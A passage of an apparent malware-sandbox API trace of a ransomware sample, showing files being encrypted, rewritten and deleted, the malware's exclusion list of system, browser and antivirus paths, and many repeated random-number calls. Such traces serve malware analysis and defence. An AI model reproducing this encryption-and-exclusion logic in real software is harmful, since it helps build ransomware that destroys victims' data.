dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.796] GetLastError () returned 0x0 [0147.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x54, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x54, lpOverlapped=0x0) returned 1 [0147.797] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x54, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x60) returned 1 [0147.797] GetLastError () returned 0x0 [0147.797] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x60, lpOverlapped=0x0) returned 1 [0147.797] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.797] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml")) returned 0x20 [0147.797] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml", dwFileAttributes=0x20) returned 0 [0147.797] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 1 [0147.797] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml")) returned 0 [0147.797] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" [0147.797] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.797] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB443.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb443.tmp")) returned 0xb443 [0147.798] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB443.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb443.tmp"), dwFlags=0x1) returned 0 [0147.798] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB443.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb443.tmp")) returned 1 [0147.799] CryptDestroyKey (hKey=0x9ad238) returned 1 [0147.799] wcslen (_String="OK") returned 0x2 [0147.799] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.799] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.799] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0147.799] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0147.799] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0147.799] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*NMCRYPT") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*Recovers your files.html") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*.exe") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*.dll") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*.lnk") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*.bat") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*.ini") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*.msi") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*.scf") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*pagefile.sys*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*AppData*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\winrar\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\java\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\windows\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\ESET\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\AVG\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*Atheros*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*Realtek*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*bootmgr*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*boot*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*boot*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*IO.SYS*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.799] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.800] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*ntldr*") returned 0 [0147.800] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*chrome*") returned 0 [0147.800] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*opera*") returned 0 [0147.800] PathMatchSpecW (pszFile="ipsrus.xml", pszSpec="*firefox*") returned 0 [0147.800] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml", pszSpec="*") returned 1 [0147.800] strlen (_Str="NMoreira") returned 0x8 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.800] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.801] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.802] CryptGenRandom (in: 